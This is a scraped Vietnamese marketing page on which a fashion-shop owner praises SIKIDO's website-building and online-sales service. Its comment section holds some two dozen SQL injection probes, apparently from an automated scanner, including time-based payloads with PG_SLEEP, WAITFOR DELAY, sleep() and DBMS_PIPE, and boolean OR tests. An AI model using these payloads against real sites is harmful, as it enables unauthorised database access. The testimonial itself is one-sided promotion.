Thanh Tân: Tôi vẫn kinh doanh hiệu quả dù rất bận rộn nhờ có....

5842 Lượt xem
Câu chuyện thành công

Chào các bạn,

Mình là Thanh Tân. Trước đây, mình chỉ là chủ của 1 cửa hàng thời trang chuyên về bán đồ thời trang nam và nữ.

Nhưng mà bây giờ, nhiều thứ đã thay đổi, và mình hiện nay đang là chủ của nhiều chi nhánh thời trang ở trên toàn quốc.

 

Cửa hàng Thời Trang Đã kinh doanh hiệu quả Như Thế Nào?

 

Chào các bạn,

Mình là Thanh Tân. Trước đây, mình chỉ là chủ của 1 cửa hàng thời trang chuyên về bán đồ thời trang nam và nữ.

Nhưng mà bây giờ, nhiều thứ đã thay đổi, và mình hiện nay đang là chủ của nhiều chi nhánh thời trang ở trên toàn quốc.

 

Trước đây, đối với mình thì Kinh doanh online có thể hỗ trợ nhiều cho viêc tiếp cận khách hàng. Còn tới thời điểm này thì Kinh doanh online là một điều quan trọng và cần thiết đối với công việc Kinh doanh của mình. Vì mình Khách hàng bên thời trang rất là nhiều cả nam lẫn nữ ( nói chung ai cũng có nhu cầu mua sắm thời trang cho mình cả), việc bán hàng ở cửa hàng shop của mình và việc tiếp cận khách hàng trên online là điều cần thiết.

 

Chính vì vậy, ngày hôm nay Mình muốn chia sẻ với các bạn cách kinh doanh online vừa nhanh, vừa hiệu quả, giúp các bạn có thể tiếp cận và đưa sản phẩm, thương hiệu của mình đến trước mắt khách hàng nhiều hơn.

 

Ngày trước mình chỉ có 1 cửa hàng thời trang nhỏ lẻ vốn bỏ ra cũng không nhiều, thời gian mình không có nhiều nên bỏ bê dần, cho nên việc kinh doanh của mình có một thời gian bị đi xuống, chi phí bỏ ra nhiều hơn so với doanh thu lợi nhuận mang về.

Nói thật với các bạn là trước đây, mình chưa biết gì nhiều hay chưa có kinh nghiệm nhiều về kinh doanh online,:

 • Thứ nhất: Với suy nghĩ chưa cần thiết  phải xây dựng một hệ thống bán hàng bài bản từ đầu, lao vào kinh doanh mà không có bất kỳ một sự chuẩn bị chu đáo về  chiến lược, về xây dựng và vận hành tổ chức, thậm chí bán hàng cũng chỉ toàn làm theo bản năng, quản lý theo kiểu  “đụng đâu làm đấy”, “sai đâu sửa đó”"ôm sô hết việc". Không biết bắt đầu từ đâu? - Công việc kinh doanh đình trệ và không biết thay đổi thế nào! 
 • Thứ hai, Mình quá bận rộn, Quá nhiều việc đã làm, tiền đã chi mà khách vẫn không thấy đâu. Khách hàng không biết đến khi nào? Họ đi rồi sao chăm sóc được . Rất nhiều khách hàng mà không biết làm sao để cho họ mua hàng của mình! 
 • Thứ ba: Không biết cách làm như thế nào để có bán được nhiều hàng, làm sao để quảng cáo, truyền thông đưa sản phẩm thương hiệu của mình đến trước mắt khách hàng như thế nào? Không biết cân đối thu chi như thế nào cho hiệu quả? Nhiều lúc mình cũng suy nghĩ nhiều lắm

Và sau đó, mình muốn mình là người vĩ đại trong cuộc sống, muốn trở thành 1 thương hiệu có tầm cỡ toàn quốc được nhiều người ưa chuộng, mình đã tìm đến SIKIDO – NƠI ĐÃ GIÚP MÌNH BỨC PHÁ MẠNH MẼ TRONG KINH DOANH, ĐẶC BIỆT LÀ KINH DOANH ONLINE

 • Mình Đã Tìm Thấy SIKIDO Như Thế Nào?

Mình đã từng search google các phương pháp KINH DOANH ONLINE hiệu quả, cũng mò đọc từng review xem là mọi người đánh giá phương pháp kinh doanh online này như thế nào? Nhưng thực sự thì ai cũng nói là phương pháp này hiệu quả lắm, hoàn hảo lắm, cho đến khi mình thử thì nói thật là, không quá một tháng là bỏ cuộc không theo nữa. Trời ơi tin được không, đó chính là mình! Thật đáng buồn!

 

Có những lúc,  mang theo khuynh hướng “Mù tịt” online trong người nên vác theo ti tỉ nỗi sợ, bản thân càng ngày càng tự ti và thất vọng vì sản phẩm đẹp chất lượng, giá tốt mà không bán được hàng như mong đợi.

 

Và mỗi lần như thế mình cảm thấy thật tệ về bản thân. Tại sao những lúc đó mình lại không thế nói Cho mình biết sâu và vận dụng tốt kinh doanh online cho công việc bán hàng của mình đi mà? Tất nhiên, muốn trở về 1 cái gì đó thì phải học và tìm hiểu về cái đó nhiều, chứ không phải tự dưng mà mình biết hết, cũng như câu nói “ có công mài sắt, có ngày nên kim’’ miếng sắt lâu ngày dùi mãi cũng thành kim mà thôi.

 

.Trong quá trình tuyệt vọng đi tìm kiếm phương pháp kinh doanh hiệu quả thì mình vô tình được một người bạn cũ giới thiệu về Công ty SIKIDO như đã nói ở trên. Lúc nghe giới thiệu, mình thấy rất hợp lý với mình bởi những điểm sau:

 • Giá cả vô cùng tiết kiệm,
 • Dành cho người vừa bận rộn, vừalười, không có mục tiêu, không có hiểu biết nhiều về kinh doanh online trên Internet. Tân đã tìm ra Phương Pháp tiếp cận khách hàng trên những kênh online hiệu quả với mình – SIKIDO đã giúp Tân vượt qua cái đó.

 

Lúc đó, Mình như muốn thốt lên. Trời ơi! Đây quả là phương pháp dành cho mình rồi, quá chuẩn luôn! Toàn những tính từ mô tả bản thân mình! Thế là ngay lập tức mình lên trang web của SIKIDO liền ( sikido.vn – Trang web chính thức của bên đó để tìm hiểu kĩ hơn, đọc từng review của từng khách hàng, quy trình làm việc, những bài viết tin tức hữu ích cho việc kinh doanh của mình.

 

Đọc xong mỗi review là mỗi lần mình cảm thấy được tạo động lực rất nhiều​, các anh chị kinh doanh mặt hàng thời trang giống như mình đã bán hàng rất hiệu quả, đơn hàng ngày ngày rất nhiều sau khi đến và hợp tác với SIKIDO. Và thế là nghĩ gì làm nấy, mình đã liên hệ với SIKIDO để qua gặp trực tiếp và trao đổi cụ thể với mình về cách tiếp cận bán hàng online hiệu quả và cũng đã cho mình xem những khách hàng bên đó đã hỗ trợ thành công trong việc tiếp cận khách hàng.

 

 

SIKIDO Có Gì Mà Hiệu Quả Đến Vậy?

Khi mình bắt đầu trải nghiệm sản phẩm của SIKIDO, mình thấy đây đúng là một bộ sản phẩm có rất nhiều ưu điểm. Vì sao ư?

Nếu như trước đây chúng ta chỉ tiếp cận khách hàng và bán hàng theo cách truyền thống thôi – có nghĩa là khách hàng sẽ tới trực tiếp cửa hàng để lựa mẫu quần áo rồi mới mua, thì Khi đến với sikido thì tối lại biết đến hệ thống kinh doanh online trên nền tảng website thông minh.

 

Một điều quan trọng nữa là SIKIDO đã xây dựng nền móng cách tìm kiếm và tiếp cận khách  hàng tiềm năng - điểm cốt lõi của tất cả các hộ kinh doanh, doanh nghiệp, công ty. Một nền móng vững chắc và được  chăm chút kỹ lưỡng sẽ không chỉ mang đến sự ổn định khi xây dựng mà còn tối đa hóa được độ bền vững của nó. SIKIDO đã đưa đến cho tôi giải pháp: Tìm kiếm và tiếp cần khách hàng tiềm năng bền vững!

 • Nhiều người, và thậm chí là bản thân mình nhiều khi đang kinh doanh trên online, và với những doanh nghiệp cửa hàng đã có hệ thống kênh website rồisẽ tự hỏi rằng: “Không biết ai vào web? họ ở đâu? họ xem gì? họ ở lại trên web bao lâu? Không biết bắt đầu từ đâu? - Công việc kinh doanh đình trệ và không biết thay đổi thế nào!  Khách hàng không biết đến khi nào? Họ đi rồi sao chăm sóc được ,… như vậy rất mất thời gian và nhất là với những người kinh doanh lớn thì cực kì nản vì phải nghĩ xem Quá nhiều việc đã làm, tiền đã chi mà khách vẫn không thấy đâu. 
 • .

Nhưng SIKIDO đã giải quyết triệt để vấn đề này. Với hệ thống website, thì mỗi ngày chúng ta không cần phải tốn thời gian để nghĩ nữa. Chúng ta chỉ cần giở quyển Kế hoạch hành động ra và trong đó có các công việc, nhiệm vụ chi tiết để hoàn thiện mỗi ngày hết rồi, chỉ cần làm thôi!

 

Một điểm thú vị nữa của SIKIDO đó là chúng ta có thể vận hành hệ thống kinh doanh online này mọi lúc mọi nơi. Và thậm chí như mình, khi đang đi chơi đi du lịch, ngủ nghỉ, thì hệ thống này vẫn hoạt động để tìm kiếm khách hàng, sau đó có thời gian thì chúng ta lại tiếp tục làm tiếp, làm sao để cho bán được hàng, khách hàng mua rồi thì họ lại tiếp tục quay trở lại mua hàng của mình.

Ưu điểm của SIKIDO đó là:

 

luôn có Các phương pháp quản lý mới nhất, công cụ quản lý hiệu quả nhất hiện nay

- Hệ thống kiến thức thực tế, có sự liên kết chặt chẽ với tính ứng dụng cao

- Hướng dẫn chi tiết, lưu đồ rõ ràng, biểu mẫu tham khảo có công thức tích hợp sẵn

- Tích hợp word, excel, pdf...thuận tiện lưu trữ, dễ dàng tra cứu sử dụng

 

        Khi Xây dựng website với bên SIKIDO, Bạn sẽ Xây dựng một hệ thống vận hành doanh nghiệp bài bản và toàn diện tiếp cận khách hàng tiềm năng và có nhu cầu. Không bị phụ thuộc vào những nhược điểm như vốn ít . Không có nhân sự chuyên môn , không có thời gian , không rành về quảng cáo. Nắm bắt theo dõi được bao nhiêu khách . Họ đi đâu ? xem gi ? Ở lại bao lâu ( Điều này rất dễ dàng). Gia tăng lượng hàng bán được hoặc lượng khách đăng ký dịch vụ. Bạn sẽ năm trong tay lượng khách tốt nhất từ trước đến giờ .Cả bộ máy sẽ vận hành trôi chảy theo lộ trình thống nhất , cùng hướng đến lợi ích của bạn. Xây dựng một hệ thống bán hàng đa kênh . Tập trung khách về một chỗ.

 

 

Đó chính là những cái mà SIKIDO sẽ hỗ trợ cho bạn trong hành trình chinh phục và tiếp cận khách hàng.

Trong quá trình tìm hiểu về SIKIDO thì cũng có nhiều bạn bè, người thân inbox hỏi mình một số thông tin mà nhiều bạn có thể cũng quan tâm. Ví dụ như là:

 • Doanh nghiệp nhỏ có cần làm website không– Hoàn toàn rất cần nhé. Vì nguồn tài chính trong các doanh nghiệp không lớn!
 • Doanh nghiệp những ngành khác có dùng được website này– Không phải lo nhé, website này không phải những thứ chuyên ngành đặc thù tuy nhiên các doanh nghiệp sẽ được sikido tư vấn cụ thể – công ty luôn có một đội ngũ tư vấn viên luôn hỗ trợ và bám sát từng bước đi của khách hàng. Nhóm trợ giảng này sẽ luôn giải đáp các thắc mắc của bạn và thậm chí là còn lắng nghe tâm sự những khó khăn mà bạn đang gặp khải khi kinh doanh online nhé! Nên cứ yên tâm nhé!
 • Đây có phải công nghệ hay cần máy tính ? những người không giỏi về công nghệ có áp dụng được không ? Đây là phần mềm bạn có thể chỉnh sửa và áp dụng được ngay có doanh nghiệp của mình.

Nhiều công việc vậy tôi có áp dụng được hết không ? Cách sử dụng website này như thế nào

 • Đi làm, bận rộn với con cái, chỉ rảnh 15-20 phút mỗi ngày thì có hiệu quả không? – Thì mình chia sẻ luôn là cả mình và con mình đều đang áp dụng phương pháp 15-20 phút một ngày đây. Và dù cho là các bạn có thể thấy thời gian này rất nhỏ, nhưng mà khi trải qua một thời gian dài đều đặn thì các bạn sẽ thu được thành quả mà chính bản thân các bạn cũng bất ngờ đấy.

Kết Quả Hài Lòng Sau Quãng Thời Gian Nỗ Lực Hết Mình!

Mình cũng muốn chia sẻ với các bạn một vài thành quả nho nhỏ của mình sau khi hợp tác với bên SIKIDO:

Thứ nhất, mình đã có thể tự quản lý và vận hành hệ thống website của mình rất dễ dàng và thuận lợi. Và khi đã có nền tảng và bộ khung vững chắc rồi, mình có thể hướng dẫn các bạn phụ trách mảng marketing onine theo phương pháp đó để rút ngắn thời gian hơn.

 

Một điều mà mình nghĩ các bạn sẽ quan tâm, đó là việc mình có thể tìm kiếm được nhiều khách hàng tiềm năng ở ngoài kia mà không tốn quá nhiều công sức hay thời gian. Khi mà đã có SIKIDO rồi rồi, bạn không cần phải lo lắng nữa!

Thanh Tân đã gặt hái được thành công sau khi hợp tác với SIKIDO!

 

Đó là những gì mà SIKIDO mang lại cho mình, thực sự rất là nhiều. Và mình nghĩ rằng nếu như thế thì chắc hẳn các bạn sẽ tìm đến SIKIDO rất nhiều cũng sẽ đạt được những thành quả như thế, thậm chí còn hơn mình nữa!

 

To: Gửi tới những ai đang thực sự muốn tìm một phương pháp kinh doanh online vừa Tiết kiệm, dành cho người Bận rộn và Không có nhiều kinh nghiệm.

 

From: Thanh Tân.

5

         

có 25 đánh giá

5
25 đánh giá
4
0 đánh giá
3
0 đánh giá
2
0 đánh giá
1
0 đánh giá

Thành công

hello

Lỗi

hello

VA

2024-04-23 23:24:58

         
Mr.
20'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
VA

2024-04-23 23:24:56

         
Mr.
20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
VA

2024-04-23 23:24:51

         
Mr.
1V6Uurqn')) OR 568=(SELECT 568 FROM PG_SLEEP(15))--
VA

2024-04-23 23:24:46

         
Mr.
ug85hSqc') OR 518=(SELECT 518 FROM PG_SLEEP(15))--
VA

2024-04-23 23:24:40

         
Mr.
MnmdxzEp' OR 286=(SELECT 286 FROM PG_SLEEP(15))--
VA

2024-04-23 23:24:36

         
Mr.
-1)) OR 186=(SELECT 186 FROM PG_SLEEP(15))--
VA

2024-04-23 23:24:28

         
Mr.
-5) OR 573=(SELECT 573 FROM PG_SLEEP(15))--
VA

2024-04-23 23:24:24

         
Mr.
-5 OR 737=(SELECT 737 FROM PG_SLEEP(15))--
VA

2024-04-23 23:24:19

         
Mr.
oNLvwBFD'; waitfor delay '0:0:15' --
VA

2024-04-23 23:24:14

         
Mr.
-1); waitfor delay '0:0:15' --
VA

2024-04-23 23:24:10

         
Mr.
-1; waitfor delay '0:0:15' --
VA

2024-04-23 23:24:06

         
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
VA

2024-04-23 23:24:01

         
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
VA

2024-04-23 23:23:58

         
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
VA

2024-04-23 23:23:55

         
Mr.
if(now()=sysdate(),sleep(15),0)
VA

2024-04-23 23:23:52

         
Mr.
-1" OR 3+297-297-1=0+0+0+1 --
VA

2024-04-23 23:23:51

         
Mr.
-1" OR 2+297-297-1=0+0+0+1 --
VA

2024-04-23 23:23:50

         
Mr.
-1' OR 3+235-235-1=0+0+0+1 or 'egJSX9e9'='
VA

2024-04-23 23:23:48

         
Mr.
-1' OR 2+235-235-1=0+0+0+1 or 'egJSX9e9'='
VA

2024-04-23 23:23:46

         
Mr.
-1' OR 3+800-800-1=0+0+0+1 --
VA

2024-04-23 23:23:38

         
Mr.
-1' OR 2+800-800-1=0+0+0+1 --
VA

2024-04-23 23:23:37

         
Mr.
-1 OR 3+530-530-1=0+0+0+1
VA

2024-04-23 23:23:34

         
Mr.
-1 OR 2+530-530-1=0+0+0+1
VA

2024-04-23 23:23:33

         
Mr.
-1 OR 3+184-184-1=0+0+0+1 --
VA

2024-04-23 23:23:32

         
Mr.
-1 OR 2+184-184-1=0+0+0+1 --

 

Thông tin liên hệ Thiết kế website tại SIKIDO:

CÔNG TY TNHH TRUYỀN THÔNG VÀ QUẢNG CÁO SIÊU KINH DOANH

Địa chỉ: 36 Đường D5, Phường 25, Bình Thạnh, TP.HCM

Hotline: 028.6294.1556 - Zalo 0835546839

Email: hotro@sikido.vn - kythuat@sikido.vn

Website: https://sikido.vn

 

 

Chia sẻ

BÀI VIẾT LIÊN QUAN

Chúng tôi đã cùng viết lên câu chuyện thành công của khách hàng như thế nào ?

Chúng tôi đã cùng viết lên câu chuyện thành công của khách hàng như thế nào ?

Chắc hẳn ai trong số các bạn cũng đã từng nghe về “ kinh doanh online”, nhất là trong thời...
Từ bỏ công việc ổn định để theo đuổi đam mê, cô nàng Mỹ Anh sẽ được gì??

Từ bỏ công việc ổn định để theo đuổi đam mê, cô nàng Mỹ Anh sẽ được gì??

Mỹ Anh đã mạnh dạn biến ước mơ kinh doanh đồ handmade của mình thành hiện thực chỉ trong 5...
Chỉ với 1 triệu đồng, cô nàng 9x Thanh Mai đã làm gì để mở được 3 cửa hàng kinh doanh cho mình

Chỉ với 1 triệu đồng, cô nàng 9x Thanh Mai đã làm gì để mở được 3 cửa hàng kinh doanh cho mình

Khởi nghiệp từ số vốn 1 triệu đồng – cô nàng 9x Thanh Mai đã thành công với ý tưởng...
Bận “bù đầu” với con cái và công việc nhưng vẫn bán hàng online hiệu quả ? ​ Có thể không? Tại sao không?

Bận “bù đầu” với con cái và công việc nhưng vẫn bán hàng online hiệu quả ? ​ Có thể không? Tại sao không?

Xin chào các bạn, mình tên Hoài Thương , năm nay mình 36 tuổi, hiện đang là giáo viên trường mầm...
2 Tháng 27 Ngày Vượt Qua “Ám Ảnh” . Từ ý định dừng hoạt động trở thành quyết định không tưởng mở thêm “1 chi nhánh MỚI”

2 Tháng 27 Ngày Vượt Qua “Ám Ảnh” . Từ ý định dừng hoạt động trở thành quyết định không tưởng mở thêm “1 chi nhánh MỚI”

Chào các bạn, mình là Mẫn Nhi. Hôm nay mình muốn chia sẻ với các bạn về giai đoạn khủng...
Bất kỳ các shop hay các doanh nghiệp sản phẩm, dịch vụ cũng có thể kinh doanh online hiệu quả nhờ vào CÔNG CỤ này!!

Bất kỳ các shop hay các doanh nghiệp sản phẩm, dịch vụ cũng có thể kinh doanh online hiệu quả nhờ vào CÔNG CỤ này!!

Xin chào các bạn.Mình tên Nhi là chủ cửa hàng Mỹ Phẩm Nhi Angle chuyên về cung cấp mặt...